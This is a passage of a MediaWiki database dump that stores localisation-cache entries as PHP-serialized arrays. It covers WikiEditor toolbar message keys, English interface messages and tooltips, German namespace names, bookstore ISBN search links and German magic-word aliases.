ar-file-caption\";i:3674;s:28:\"wikieditor-toolbar-file-size\";i:3675;s:29:\"wikieditor-toolbar-file-float\";i:3676;s:31:\"wikieditor-toolbar-file-default\";i:3677;s:30:\"wikieditor-toolbar-file-format\";i:3678;s:35:\"wikieditor-toolbar-file-format-none\";i:3679;s:35:\"wikieditor-toolbar-tool-file-insert\";i:3680;s:35:\"wikieditor-toolbar-tool-file-cancel\";i:3681;s:33:\"wikieditor-toolbar-tool-reference\";i:3682;s:41:\"wikieditor-toolbar-tool-reference-example\";i:3683;s:40:\"wikieditor-toolbar-tool-reference-cancel\";i:3684;s:39:\"wikieditor-toolbar-tool-reference-title\";i:3685;s:40:\"wikieditor-toolbar-tool-reference-insert\";i:3686;s:38:\"wikieditor-toolbar-tool-reference-text\";i:3687;s:33:\"wikieditor-toolbar-tool-signature\";i:3688;s:35:\"wikieditor-toolbar-section-advanced\";i:3689;s:31:\"wikieditor-toolbar-tool-heading\";i:3690;s:33:\"wikieditor-toolbar-tool-heading-1\";i:3691;s:33:\"wikieditor-toolbar-tool-heading-2\";i:3692;s:33:\"wikieditor-toolbar-tool-heading-3\";i:3693;s:33:\"wikieditor-toolbar-tool-heading-4\";i:3694;s:33:\"wikieditor-toolbar-tool-heading-5\";i:3695;s:39:\"wikieditor-toolbar-tool-heading-example\";i:3696;s:31:\"wikieditor-toolbar-group-format\";i:3697;s:29:\"wikieditor-toolbar-tool-ulist\";i:3698;s:37:\"wikieditor-toolbar-tool-ulist-example\";i:3699;s:29:\"wikieditor-toolbar-tool-olist\";i:3700;s:37:\"wikieditor-toolbar-tool-olist-example\";i:3701;s:30:\"wikieditor-toolbar-tool-nowiki\";i:3702;s:38:\"wikieditor-toolbar-tool-nowiki-example\";i:3703;s:32:\"wikieditor-toolbar-tool-redirect\";i:3704;s:40:\"wikieditor-toolbar-tool-redirect-example\";i:3705;s:27:\"wikieditor-toolbar-tool-big\";i:3706;s:35:\"wikieditor-toolbar-tool-big-example\";i:3707;s:29:\"wikieditor-toolbar-tool-small\";i:3708;s:37:\"wikieditor-toolbar-tool-small-example\";i:3709;s:35:\"wikieditor-toolbar-tool-superscript\";i:3710;s:43:\"wikieditor-toolbar-tool-superscript-example\";i:3711;s:33:\"wikieditor-toolbar-tool-subscript\";i:3712;s:41:\"wikieditor-toolbar-tool-subscript-example\";i:3713;s:31:\"wikieditor-toolbar-group-insert\";i:3714;s:31:\"wikieditor-toolbar-tool-gallery\";i:3715;s:39:\"wikieditor-toolbar-tool-gallery-example\";i:3716;s:31:\"wikieditor-toolbar-tool-newline\";i:3717;s:29:\"wikieditor-toolbar-tool-table\";i:3718;s:41:\"wikieditor-toolbar-tool-table-example-old\";i:3719;s:47:\"wikieditor-toolbar-tool-table-example-cell-text\";i:3720;s:44:\"wikieditor-toolbar-tool-table-example-header\";i:3721;s:35:\"wikieditor-toolbar-tool-table-title\";i:3722;s:45:\"wikieditor-toolbar-tool-table-dimensions-rows\";i:3723;s:48:\"wikieditor-toolbar-tool-table-dimensions-columns\";i:3724;s:47:\"wikieditor-toolbar-tool-table-dimensions-header\";i:3725;s:39:\"wikieditor-toolbar-tool-table-wikitable\";i:3726;s:38:\"wikieditor-toolbar-tool-table-sortable\";i:3727;s:37:\"wikieditor-toolbar-tool-table-example\";i:3728;s:37:\"wikieditor-toolbar-tool-table-preview\";i:3729;s:36:\"wikieditor-toolbar-tool-table-insert\";i:3730;s:36:\"wikieditor-toolbar-tool-table-cancel\";i:3731;s:42:\"wikieditor-toolbar-tool-table-example-text\";i:3732;s:37:\"wikieditor-toolbar-tool-table-toomany\";i:3733;s:43:\"wikieditor-toolbar-tool-table-invalidnumber\";i:3734;s:34:\"wikieditor-toolbar-tool-table-zero\";i:3735;s:31:\"wikieditor-toolbar-tool-replace\";i:3736;s:37:\"wikieditor-toolbar-tool-replace-title\";i:3737;s:38:\"wikieditor-toolbar-tool-replace-search\";i:3738;s:39:\"wikieditor-toolbar-tool-replace-replace\";i:3739;s:36:\"wikieditor-toolbar-tool-replace-case\";i:3740;s:37:\"wikieditor-toolbar-tool-replace-regex\";i:3741;s:47:\"wikieditor-toolbar-tool-replace-button-findnext\";i:3742;s:46:\"wikieditor-toolbar-tool-replace-button-replace\";i:3743;s:49:\"wikieditor-toolbar-tool-replace-button-replaceall\";i:3744;s:37:\"wikieditor-toolbar-tool-replace-close\";i:3745;s:39:\"wikieditor-toolbar-tool-replace-nomatch\";i:3746;s:39:\"wikieditor-toolbar-tool-replace-success\";i:3747;s:43:\"wikieditor-toolbar-tool-replace-emptysearch\";i:3748;s:44:\"wikieditor-toolbar-tool-replace-invalidregex\";i:3749;s:37:\"wikieditor-toolbar-section-characters\";i:3750;s:40:\"wikieditor-toolbar-characters-page-latin\";i:3751;s:48:\"wikieditor-toolbar-characters-page-latinextended\";i:3752;s:38:\"wikieditor-toolbar-characters-page-ipa\";i:3753;s:42:\"wikieditor-toolbar-characters-page-symbols\";i:3754;s:40:\"wikieditor-toolbar-characters-page-greek\";i:3755;s:43:\"wikieditor-toolbar-characters-page-cyrillic\";i:3756;s:41:\"wikieditor-toolbar-characters-page-arabic\";i:3757;s:49:\"wikieditor-toolbar-characters-page-arabicextended\";i:3758;s:42:\"wikieditor-toolbar-characters-page-persian\";i:3759;s:41:\"wikieditor-toolbar-characters-page-hebrew\";i:3760;s:41:\"wikieditor-toolbar-characters-page-bangla\";i:3761;s:40:\"wikieditor-toolbar-characters-page-tamil\";i:3762;s:41:\"wikieditor-toolbar-characters-page-telugu\";i:3763;s:42:\"wikieditor-toolbar-characters-page-sinhala\";i:3764;s:43:\"wikieditor-toolbar-characters-page-gujarati\";i:3765;s:45:\"wikieditor-toolbar-characters-page-devanagari\";i:3766;s:39:\"wikieditor-toolbar-characters-page-thai\";i:3767;s:38:\"wikieditor-toolbar-characters-page-lao\";i:3768;s:40:\"wikieditor-toolbar-characters-page-khmer\";i:3769;s:36:\"wikieditor-toolbar-characters-endash\";i:3770;s:36:\"wikieditor-toolbar-characters-emdash\";i:3771;s:35:\"wikieditor-toolbar-characters-minus\";i:3772;s:31:\"wikieditor-toolbar-section-help\";i:3773;s:43:\"wikieditor-toolbar-help-heading-description\";i:3774;s:38:\"wikieditor-toolbar-help-heading-syntax\";i:3775;s:38:\"wikieditor-toolbar-help-heading-result\";i:3776;s:35:\"wikieditor-toolbar-help-page-format\";i:3777;s:33:\"wikieditor-toolbar-help-page-link\";i:3778;s:36:\"wikieditor-toolbar-help-page-heading\";i:3779;s:33:\"wikieditor-toolbar-help-page-list\";i:3780;s:33:\"wikieditor-toolbar-help-page-file\";i:3781;s:38:\"wikieditor-toolbar-help-page-reference\";i:3782;s:39:\"wikieditor-toolbar-help-page-discussion\";i:3783;s:50:\"wikieditor-toolbar-help-content-italic-description\";i:3784;s:45:\"wikieditor-toolbar-help-content-italic-syntax\";i:3785;s:45:\"wikieditor-toolbar-help-content-italic-result\";i:3786;s:48:\"wikieditor-toolbar-help-content-bold-description\";i:3787;s:43:\"wikieditor-toolbar-help-content-bold-syntax\";i:3788;s:43:\"wikieditor-toolbar-help-content-bold-result\";i:3789;s:54:\"wikieditor-toolbar-help-content-bolditalic-description\";i:3790;s:49:\"wikieditor-toolbar-help-content-bolditalic-syntax\";i:3791;s:49:\"wikieditor-toolbar-help-content-bolditalic-result\";i:3792;s:49:\"wikieditor-toolbar-help-content-ilink-description\";i:3793;s:44:\"wikieditor-toolbar-help-content-ilink-syntax\";i:3794;s:44:\"wikieditor-toolbar-help-content-ilink-result\";i:3795;s:49:\"wikieditor-toolbar-help-content-xlink-description\";i:3796;s:44:\"wikieditor-toolbar-help-content-xlink-syntax\";i:3797;s:44:\"wikieditor-toolbar-help-content-xlink-result\";i:3798;s:52:\"wikieditor-toolbar-help-content-heading2-description\";i:3799;s:47:\"wikieditor-toolbar-help-content-heading2-syntax\";i:3800;s:47:\"wikieditor-toolbar-help-content-heading2-result\";i:3801;s:52:\"wikieditor-toolbar-help-content-heading3-description\";i:3802;s:47:\"wikieditor-toolbar-help-content-heading3-syntax\";i:3803;s:47:\"wikieditor-toolbar-help-content-heading3-result\";i:3804;s:52:\"wikieditor-toolbar-help-content-heading4-description\";i:3805;s:47:\"wikieditor-toolbar-help-content-heading4-syntax\";i:3806;s:47:\"wikieditor-toolbar-help-content-heading4-result\";i:3807;s:52:\"wikieditor-toolbar-help-content-heading5-description\";i:3808;s:47:\"wikieditor-toolbar-help-content-heading5-syntax\";i:3809;s:47:\"wikieditor-toolbar-help-content-heading5-result\";i:3810;s:49:\"wikieditor-toolbar-help-content-ulist-description\";i:3811;s:44:\"wikieditor-toolbar-help-content-ulist-syntax\";i:3812;s:44:\"wikieditor-toolbar-help-content-ulist-result\";i:3813;s:49:\"wikieditor-toolbar-help-content-olist-description\";i:3814;s:44:\"wikieditor-toolbar-help-content-olist-syntax\";i:3815;s:44:\"wikieditor-toolbar-help-content-olist-result\";i:3816;s:48:\"wikieditor-toolbar-help-content-file-description\";i:3817;s:43:\"wikieditor-toolbar-help-content-file-syntax\";i:3818;s:43:\"wikieditor-toolbar-help-content-file-result\";i:3819;s:53:\"wikieditor-toolbar-help-content-reference-description\";i:3820;s:48:\"wikieditor-toolbar-help-content-reference-syntax\";i:3821;s:48:\"wikieditor-toolbar-help-content-reference-result\";i:3822;s:55:\"wikieditor-toolbar-help-content-rereference-description\";i:3823;s:50:\"wikieditor-toolbar-help-content-rereference-syntax\";i:3824;s:50:\"wikieditor-toolbar-help-content-rereference-result\";i:3825;s:58:\"wikieditor-toolbar-help-content-showreferences-description\";i:3826;s:53:\"wikieditor-toolbar-help-content-showreferences-syntax\";i:3827;s:53:\"wikieditor-toolbar-help-content-showreferences-result\";i:3828;s:62:\"wikieditor-toolbar-help-content-signaturetimestamp-description\";i:3829;s:57:\"wikieditor-toolbar-help-content-signaturetimestamp-syntax\";i:3830;s:57:\"wikieditor-toolbar-help-content-signaturetimestamp-result\";i:3831;s:53:\"wikieditor-toolbar-help-content-signature-description\";i:3832;s:48:\"wikieditor-toolbar-help-content-signature-syntax\";i:3833;s:48:\"wikieditor-toolbar-help-content-signature-result\";i:3834;s:50:\"wikieditor-toolbar-help-content-indent-description\";i:3835;s:45:\"wikieditor-toolbar-help-content-indent-syntax\";i:3836;s:45:\"wikieditor-toolbar-help-content-indent-result\";}}'),('en','preload','a:3:{s:8:\"messages\";a:104:{s:9:\"aboutpage\";s:13:\"Project:About\";s:9:\"aboutsite\";s:18:\"About {{SITENAME}}\";s:17:\"accesskey-ca-edit\";s:1:\"e\";s:20:\"accesskey-ca-history\";s:1:\"h\";s:23:\"accesskey-ca-nstab-main\";s:1:\"c\";s:17:\"accesskey-ca-talk\";s:1:\"t\";s:17:\"accesskey-ca-view\";N;s:25:\"accesskey-n-currentevents\";s:0:\"\";s:16:\"accesskey-n-help\";s:0:\"\";s:32:\"accesskey-n-mainpage-description\";s:1:\"z\";s:18:\"accesskey-n-portal\";s:0:\"\";s:22:\"accesskey-n-randompage\";s:1:\"x\";s:25:\"accesskey-n-recentchanges\";s:1:\"r\";s:16:\"accesskey-p-logo\";s:0:\"\";s:18:\"accesskey-pt-login\";s:1:\"o\";s:16:\"accesskey-search\";s:1:\"f\";s:25:\"accesskey-search-fulltext\";s:0:\"\";s:19:\"accesskey-search-go\";s:0:\"\";s:21:\"accesskey-t-permalink\";s:0:\"\";s:31:\"accesskey-t-recentchangeslinked\";s:1:\"k\";s:24:\"accesskey-t-specialpages\";s:1:\"q\";s:25:\"accesskey-t-whatlinkshere\";s:1:\"j\";s:7:\"actions\";s:7:\"Actions\";s:10:\"anonnotice\";s:1:\"-\";s:13:\"currentevents\";s:14:\"Current events\";s:17:\"currentevents-url\";s:22:\"Project:Current events\";s:14:\"disclaimerpage\";s:26:\"Project:General disclaimer\";s:11:\"disclaimers\";s:11:\"Disclaimers\";s:4:\"edit\";s:4:\"Edit\";s:11:\"editsection\";s:4:\"edit\";s:15:\"editsectionhint\";s:16:\"Edit section: $1\";s:4:\"help\";s:4:\"Help\";s:8:\"helppage\";s:63:\"https://www.mediawiki.org/wiki/Special:MyLanguage/Help:Contents\";s:24:\"interlanguage-link-title\";s:9:\"$1 – $2\";s:6:\"jumpto\";s:8:\"Jump to:\";s:16:\"jumptonavigation\";s:10:\"navigation\";s:12:\"jumptosearch\";s:6:\"search\";s:14:\"lastmodifiedat\";s:41:\"This page was last modified on $1, at $2.\";s:8:\"mainpage\";s:9:\"Main Page\";s:20:\"mainpage-description\";s:9:\"Main page\";s:14:\"mainpage-nstab\";s:0:\"\";s:10:\"namespaces\";s:10:\"Namespaces\";s:10:\"navigation\";s:10:\"Navigation\";s:23:\"nav-login-createaccount\";s:23:\"Log in / create account\";s:10:\"nstab-main\";s:4:\"Page\";s:10:\"nstab-talk\";N;s:15:\"opensearch-desc\";s:34:\"{{SITENAME}} ({{CONTENTLANGUAGE}})\";s:14:\"pagecategories\";s:33:\"{{PLURAL:$1|Category|Categories}}\";s:18:\"pagecategorieslink\";s:18:\"Special:Categories\";s:9:\"pagetitle\";s:17:\"$1 - {{SITENAME}}\";s:23:\"pagetitle-view-mainpage\";s:12:\"{{SITENAME}}\";s:9:\"permalink\";s:14:\"Permanent link\";s:13:\"personaltools\";s:14:\"Personal tools\";s:6:\"portal\";s:16:\"Community portal\";s:10:\"portal-url\";s:24:\"Project:Community portal\";s:16:\"printableversion\";s:17:\"Printable version\";s:7:\"privacy\";s:14:\"Privacy policy\";s:11:\"privacypage\";s:22:\"Project:Privacy policy\";s:10:\"randompage\";s:11:\"Random page\";s:14:\"randompage-url\";s:14:\"Special:Random\";s:13:\"recentchanges\";s:14:\"Recent changes\";s:27:\"recentchangeslinked-toolbox\";s:15:\"Related changes\";s:17:\"recentchanges-url\";s:21:\"Special:RecentChanges\";s:13:\"retrievedfrom\";s:19:\"Retrieved from \"$1\"\";s:6:\"search\";s:6:\"Search\";s:13:\"searcharticle\";s:2:\"Go\";s:12:\"searchbutton\";s:6:\"Search\";s:7:\"sidebar\";s:158:\"\n* navigation\n** mainpage|mainpage-description\n** recentchanges-url|recentchanges\n** randompage-url|randompage\n** helppage|help\n* SEARCH\n* TOOLBOX\n* LANGUAGES\";s:18:\"navigation-heading\";s:15:\"Navigation menu\";s:14:\"site-atom-feed\";s:12:\"$1 Atom feed\";s:10:\"sitenotice\";s:1:\"-\";s:12:\"specialpages\";s:13:\"Special pages\";s:7:\"tagline\";s:17:\"From {{SITENAME}}\";s:4:\"talk\";s:10:\"Discussion\";s:7:\"toolbox\";s:5:\"Tools\";s:15:\"tooltip-ca-edit\";s:67:\"You can edit this page. Please use the preview button before saving\";s:18:\"tooltip-ca-history\";s:27:\"Past revisions of this page\";s:21:\"tooltip-ca-nstab-main\";s:21:\"View the content page\";s:15:\"tooltip-ca-talk\";s:33:\"Discussion about the content page\";s:15:\"tooltip-ca-view\";N;s:23:\"tooltip-n-currentevents\";s:45:\"Find background information on current events\";s:14:\"tooltip-n-help\";s:21:\"The place to find out\";s:30:\"tooltip-n-mainpage-description\";s:19:\"Visit the main page\";s:16:\"tooltip-n-portal\";s:56:\"About the project, what you can do, where to find things\";s:20:\"tooltip-n-randompage\";s:18:\"Load a random page\";s:23:\"tooltip-n-recentchanges\";s:36:\"A list of recent changes in the wiki\";s:14:\"tooltip-p-logo\";s:19:\"Visit the main page\";s:20:\"tooltip-p-navigation\";N;s:12:\"tooltip-p-tb\";N;s:16:\"tooltip-pt-login\";s:58:\"You are encouraged to log in; however, it is not mandatory\";s:14:\"tooltip-search\";s:19:\"Search {{SITENAME}}\";s:23:\"tooltip-search-fulltext\";s:30:\"Search the pages for this text\";s:17:\"tooltip-search-go\";s:43:\"Go to a page with this exact name if exists\";s:19:\"tooltip-t-permalink\";s:43:\"Permanent link to this revision of the page\";s:29:\"tooltip-t-recentchangeslinked\";s:45:\"Recent changes in pages linked from this page\";s:22:\"tooltip-t-specialpages\";s:27:\"A list of all special pages\";s:23:\"tooltip-t-whatlinkshere\";s:39:\"A list of all wiki pages that link here\";s:8:\"variants\";s:8:\"Variants\";s:16:\"vector-view-edit\";s:4:\"Edit\";s:19:\"vector-view-history\";s:12:\"View history\";s:16:\"vector-view-view\";s:4:\"Read\";s:9:\"viewcount\";s:56:\"This page has been accessed {{PLURAL:$1|once|$1 times}}.\";s:5:\"views\";s:5:\"Views\";s:13:\"whatlinkshere\";s:15:\"What links here\";}s:11:\"dateFormats\";a:20:{s:8:\"mdy time\";s:3:\"H:i\";s:8:\"mdy date\";s:6:\"F j, Y\";s:13:\"mdy monthonly\";s:3:\"F Y\";s:8:\"mdy both\";s:11:\"H:i, F j, Y\";s:10:\"mdy pretty\";s:3:\"F j\";s:8:\"dmy time\";s:3:\"H:i\";s:8:\"dmy date\";s:5:\"j F Y\";s:13:\"dmy monthonly\";s:3:\"F Y\";s:8:\"dmy both\";s:10:\"H:i, j F Y\";s:10:\"dmy pretty\";s:3:\"j F\";s:8:\"ymd time\";s:3:\"H:i\";s:8:\"ymd date\";s:5:\"Y F j\";s:13:\"ymd monthonly\";s:3:\"Y F\";s:8:\"ymd both\";s:10:\"H:i, Y F j\";s:10:\"ymd pretty\";s:3:\"F j\";s:13:\"ISO 8601 time\";s:11:\"xnH:xni:xns\";s:13:\"ISO 8601 date\";s:11:\"xnY-xnm-xnd\";s:18:\"ISO 8601 monthonly\";s:7:\"xnY-xnm\";s:13:\"ISO 8601 both\";s:25:\"xnY-xnm-xnd\"T\"xnH:xni:xns\";s:15:\"ISO 8601 pretty\";s:7:\"xnm-xnd\";}s:14:\"namespaceNames\";a:17:{i:-2;s:5:\"Media\";i:-1;s:7:\"Special\";i:0;s:0:\"\";i:1;s:4:\"Talk\";i:2;s:4:\"User\";i:3;s:9:\"User_talk\";i:5;s:7:\"$1_talk\";i:6;s:4:\"File\";i:7;s:9:\"File_talk\";i:8;s:9:\"MediaWiki\";i:9;s:14:\"MediaWiki_talk\";i:10;s:8:\"Template\";i:11;s:13:\"Template_talk\";i:12;s:4:\"Help\";i:13;s:9:\"Help_talk\";i:14;s:8:\"Category\";i:15;s:13:\"Category_talk\";}}'),('de','fallback','s:2:\"en\";'),('de','namespaceNames','a:17:{i:-2;s:6:\"Medium\";i:-1;s:7:\"Spezial\";i:1;s:10:\"Diskussion\";i:2;s:8:\"Benutzer\";i:3;s:19:\"Benutzer_Diskussion\";i:5;s:13:\"$1_Diskussion\";i:6;s:5:\"Datei\";i:7;s:16:\"Datei_Diskussion\";i:8;s:9:\"MediaWiki\";i:9;s:20:\"MediaWiki_Diskussion\";i:10;s:7:\"Vorlage\";i:11;s:18:\"Vorlage_Diskussion\";i:12;s:5:\"Hilfe\";i:13;s:16:\"Hilfe_Diskussion\";i:14;s:9:\"Kategorie\";i:15;s:20:\"Kategorie_Diskussion\";i:0;s:0:\"\";}'),('de','bookstoreList','a:5:{s:11:\"abebooks.de\";s:56:\"http://www.abebooks.de/servlet/BookSearchPL?ph=2&isbn=$1\";s:9:\"amazon.de\";s:44:\"http://www.amazon.de/gp/search/field-isbn=$1\";s:7:\"buch.de\";s:51:\"http://www.buch.de/shop/home/suche/?sswg=BUCH&sq=$1\";s:35:\"Karlsruher Virtueller Katalog (KVK)\";s:47:\"http://www.ubka.uni-karlsruhe.de/kvk.html?SB=$1\";s:25:\"Lehmanns Fachbuchhandlung\";s:55:\"http://www.lob.de/cgi-bin/work/suche?flag=new&stich1=$1\";}'),('de','magicWords','a:168:{s:8:\"redirect\";a:3:{i:0;i:0;i:1;s:14:\"#WEITERLEITUNG\";i:2;s:9:\"#REDIRECT\";}s:5:\"notoc\";a:4:{i:0;i:0;i:1;s:27:\"__KEIN_INHALTSVERZEICHNIS__\";i:2;s:26:\"__KEININHALTSVERZEICHNIS__\";i:3;s:9:\"__NOTOC__\";}s:9:\"nogallery\";a:4:{i:0;i:0;i:1;s:17:\"__KEINE_GALERIE__\";i:2;s:16:\"__KEINEGALERIE__\";i:3;s:13:\"__NOGALLERY__\";}s:8:\"forcetoc\";a:3:{i:0;i:0;i:1;s:32:\"__INHALTSVERZEICHNIS_ERZWINGEN__\";i:2;s:12:\"__FORCETOC__\";}s:3:\"toc\";a:3:{i:0;i:0;i:1;s:22:\"__INHALTSVERZEICHNIS__\";i:2;s:7:\"__TOC__\";}s:13:\"noeditsection\";a:3:{i:0;i:0;i:1;s:31:\"__ABSCHNITTE_NICHT_BEARBEITEN__\";i:2;s:17:\"__NOEDITSECTION__\";}s:12:\"currentmonth\";a:5:{i:0;i:1;i:1;s:14:\"JETZIGER_MONAT\";i:2;s:16:\"JETZIGER_MONAT_2\";i:3;s:12:\"CURRENTMONTH\";i:4;s:13:\"CURRENTMONTH2\";}s:13:\"currentmonth1\";a:3:{i:0;i:1;i:1;s:16:\"JETZIGER_MONAT_1\";i:2;s:13:\"CURRENTMONTH1\";}s:16:\"currentmonthname\";a:3:{i:0;i:1;i:1;s:19:\"JETZIGER_MONATSNAME\";i:2;s:16:\"CURRENTMONTHNAME\";}s:19:\"currentmonthnamegen\";a:4:{i:0;i:1;i:1;s:27:\"JETZIGER_MONATSNAME_GENITIV\";i:2;s:23:\"JETZIGER_MONATSNAME_GEN\";i:3;s:19:\"CURRENTMONTHNAMEGEN\";}s:18:\"currentmonthabbrev\";a:3:{i:0;i:1;i:1;s:24:\"JETZIGER_MONATSNAME_KURZ\";i:2;s:18:\"CURRENTMONTHABBREV\";}s:10:\"currentday\";a:4:{i:0;i:1;i:1;s:20:\"JETZIGER_KALENDERTAG\";i:2;s:12:\"JETZIGER_TAG\";i:3;s:10:\"CURRENTDAY\";}s:11:\"currentday2\";a:4:{i:0;i:1;i:1;s:22:\"JETZIGER_KALENDERTAG_2\";i:2;s:14:\"JETZIGER_TAG_2\";i:3;s:11:\"CURRENTDAY2\";}s:14:\"currentdayname\";a:3:{i:0;i:1;i:1;s:18:\"JETZIGER_WOCHENTAG\";i:2;s:14:\"CURRENTDAYNAME\";}s:11:\"currentyear\";a:3:{i:0;i:1;i:1;s:13:\"JETZIGES_JAHR\";i:2;s:11:\"CURRENTYEAR\";}s:11:\"currenttime\";a:3:{i:0;i:1;i:1;s:15:\"JETZIGE_UHRZEIT\";i:2;s:11:\"CURRENTTIME\";}s:11:\"currenthour\";a:3:{i:0;i:1;i:1;s:14:\"JETZIGE_STUNDE\";i:2;s:11:\"CURRENTHOUR\";}s:10:\"localmonth\";a:5:{i:0;i:1;i:1;s:13:\"LOKALER_MONAT\";i:2;s:15:\"LOKALER_MONAT_2\";i:3;s:10:\"LOCALMONTH\";i:4;s:11:\"LOCALMONTH2\";}s:11:\"localmonth1\";a:3:{i:0;i:1;i:1;s:15:\"LOKALER_MONAT_1\";i:2;s:11:\"LOCALMONTH1\";}s:14:\"localmonthname\";a:3:{i:0;i:1;i:1;s:18:\"LOKALER_MONATSNAME\";i:2;s:14:\"LOCALMONTHNAME\";}s:17:\"localmonthnamegen\";a:4:{i:0;i:1;i:1;s:26:\"LOKALER_MONATSNAME_GENITIV\";i:2;s:22:\"LOKALER_MONATSNAME_GEN\";i:3;s:17:\"LOCALMONTHNAMEGEN\";}s:16:\"localmonthabbrev\";a:3:{i:0;i:1;i:1;s:23:\"LOKALER_MONATSNAME_KURZ\";i:2;s:16:\"LOCALMONTHABBREV\";}s:8:\"localday\";a:4:{i:0;i:1;i:1;s:19:\"LOKALER_KALENDERTAG\";i:2;s:11:\"LOKALER_TAG\";i:3;s:8:\"LOCALDAY\";}s:9:\"localday2\";a:4:{i:0;i:1;i:1;s:21:\"LOKALER_KALENDERTAG_2\";i:2;s:13:\"LOKALER_TAG_2\";i:3;s:9:\"LOCALDAY2\";}s:12:\"localdayname\";a:3:{i:0;i:1;i:1;s:17:\"LOKALER_WOCHENTAG\";i:2;s:12:\"LOCALDAYNAME\";}s:9:\"localyear\";a:3:{i:0;i:1;i:1;s:12:\"LOKALES_JAHR\";i:2;s:9:\"LOCALYEAR\";}s:9:\"localtime\";a:3:{i:0;i:1;i:1;s:14:\"LOKALE_UHRZEIT\";i:2;s:9:\"LOCALTIME\";}s:9:\"localhour\";a:3:{i:0;i:1;i:1;s:13:\"LOKALE_STUNDE\";i:2;s:9:\"LOCALHOUR\";}s:13:\"numberofpages\";a:3:{i:0;i:1;i:1;s:12:\"SEITENANZAHL\";i:2;s:13:\"NUMBEROFPAGES\";}s:16:\"numberofarticles\";a:3:{i:0;i:1;i:1;s:13:\"ARTIKELANZAHL\";i:2;s:16:\"NUMBEROFARTICLES\";}s:13:\"numberoffiles\";a:3:{i:0;i:1;i:1;s:11:\"DATEIANZAHL\";i:2;s:13:\"NUMBEROFFILES\";}s:13:\"numberofusers\";a:3:{i:0;i:1;i:1;s:14:\"BENUTZERANZAHL\";i:2;s:13:\"NUMBEROFUSERS\";}s:19:\"numberofactiveusers\";a:3:{i:0;i:1;i:1;s:15:\"AKTIVE_BENUTZER\";i:2;s:19:\"NUMBEROFACTIVEUSERS\";}s:13:\"numberofedits\";a:3:{i:0;i:1;i:1;s:18:\"BEARBEITUNGSANZAHL\";i:2;s:13:\"NUMBEROFEDITS\";}s:13:\"numberofviews\";a:3:{i:0;i:1;i:1;s:13:\"BETRACHTUNGEN\";i:2;s:13:\"NUMBEROFVIEWS\";}s:8:\"pagename\";a:3:{i:0;i:1;i:1;s:10:\"SEITENNAME\";i:2;s:8:\"PAGENAME\";}s:9:\"pagenamee\";a:3:{i:0;i:1;i:1;s:14:\"SEITENNAME_URL\";i:2;s:9:\"PAGENAMEE\";}s:9:\"namespace\";a:3:{i:0;i:1;i:1;s:10:\"NAMENSRAUM\";i:2;s:9:\"NAMESPACE\";}s:10:\"namespacee\";a:3:{i:0;i:1;i:1;s:14:\"NAMENSRAUM_URL\";i:2;s:10:\"NAMESPACEE\";}s:15:\"namespacenumber\";a:3:{i:0;i:1;i:1;s:16:\"NAMENSRAUMNUMMER\";i:2;s:15:\"NAMESPACENUMBER\";}s:9:\"talkspace\";a:4:{i:0;i:1;i:1;s:21:\"DISKUSSIONSNAMENSRAUM\";i:2;s:7:\"DISK_NR\";i:3;s:9:\"TALKSPACE\";}s:10:\"talkspacee\";a:4:{i:0;i:1;i:1;s:25:\"DISKUSSIONSNAMENSRAUM_URL\";i:2;s:11:\"DISK_NR_URL\";i:3;s:10:\"TALKSPACEE\";}s:12:\"subjectspace\";a:4:{i:0;i:1;i:1;s:15:\"HAUPTNAMENSRAUM\";i:2;s:12:\"SUBJECTSPACE\";i:3;s:12:\"ARTICLESPACE\";}s:13:\"subjectspacee\";a:4:{i:0;i:1;i:1;s:19:\"HAUPTNAMENSRAUM_URL\";i:2;s:13:\"SUBJECTSPACEE\";i:3;s:13:\"ARTICLESPACEE\";}s:12:\"fullpagename\";a:3:{i:0;i:1;i:1;s:17:\"VOLLER_SEITENNAME\";i:2;s:12:\"FULLPAGENAME\";}s:13:\"fullpagenamee\";a:3:{i:0;i:1;i:1;s:21:\"VOLLER_SEITENNAME_URL\";i:2;s:13:\"FULLPAGENAMEE\";}s:11:\"subpagename\";a:3:{i:0;i:1;i:1;s:10:\"UNTERSEITE\";i:2;s:11:\"SUBPAGENAME\";}s:12:\"subpagenamee\";a:3:{i:0;i:1;i:1;s:14:\"UNTERSEITE_URL\";i:2;s:12:\"SUBPAGENAMEE\";}s:12:\"rootpagename\";a:3:{i:0;i:1;i:1;s:10:\"STAMMSEITE\";i:2;s:12:\"ROOTPAGENAME\";}s:13:\"rootpagenamee\";a:3:{i:0;i:1;i:1;s:14:\"STAMMSEITE_URL\";i:2;s:13:\"ROOTPAGENAMEE\";}s:12:\"basepagename\";a:3:{i:0;i:1;i:1;s:9:\"OBERSEITE\";i:2;s:12:\"BASEPAGENAME\";}s:13:\"basepagenamee\";a:3:{i:0;i:1;i:1;s:13:\"OBERSEITE_URL\";i:2;s:13:\"BASEPAGENAMEE\";}s:12:\"talkpagename\";a:4:{i:0;i:1;i:1;s:16:\"DISKUSSIONSSEITE\";i:2;s:4:\"DISK\";i:3;s:12:\"TALKPAGENAME\";}s:13:\"talkpagenamee\";a:4:{i:0;i:1;i:1;s:20:\"DISKUSSIONSSEITE_URL\";i:2;s:8:\"DISK_URL\";i:3;s:13:\"TALKPAGENAMEE\";}s:15:\"subjectpagename\";a:6:{i:0;i:1;i:1;s:15:\"HAUPTSEITENNAME\";i:2;s:11:\"VORDERSEITE\";i:3;s:10:\"HAUPTSEITE\";i:4;s:15:\"SUBJECTPAGENAME\";i:5;s:15:\"ARTICLEPAGENAME\";}s:16:\"subjectpagenamee\";a:6:{i:0;i:1;i:1;s:19:\"HAUPTSEITENNAME_URL\";i:2;s:15:\"VORDERSEITE_URL\";i:3;s:14:\"HAUPTSEITE_URL\";i:4;s:16:\"SUBJECTPAGENAMEE\";i:5;s:16:\"ARTICLEPAGENAMEE\";}s:5:\"subst\";a:3:{i:0;i:0;i:1;s:4:\"ERS:\";i:2;s:6:\"SUBST:\";}s:9:\"safesubst\";a:4:{i:0;i:0;i:1;s:11:\"SICHER_ERS:\";i:2;s:10:\"SICHERERS:\";i:3;s:10:\"SAFESUBST:\";}s:13:\"img_thumbnail\";a:5:{i:0;i:1;i:1;s:4:\"mini\";i:2;s:8:\"miniatur\";i:3;s:9:\"thumbnail\";i:4;s:5:\"thumb\";}s:15:\"img_manualthumb\";a:5:{i:0;i:1;i:1;s:11:\"miniatur=$1\";i:2;s:7:\"mini=$1\";i:3;s:12:\"thumbnail=$1\";i:4;s:8:\"thumb=$1\";}s:9:\"img_right\";a:3:{i:0;i:1;i:1;s:6:\"rechts\";i:2;s:5:\"right\";}s:8:\"img_left\";a:3:{i:0;i:1;i:1;s:5:\"links\";i:2;s:4:\"left\";}s:8:\"img_none\";a:3:{i:0;i: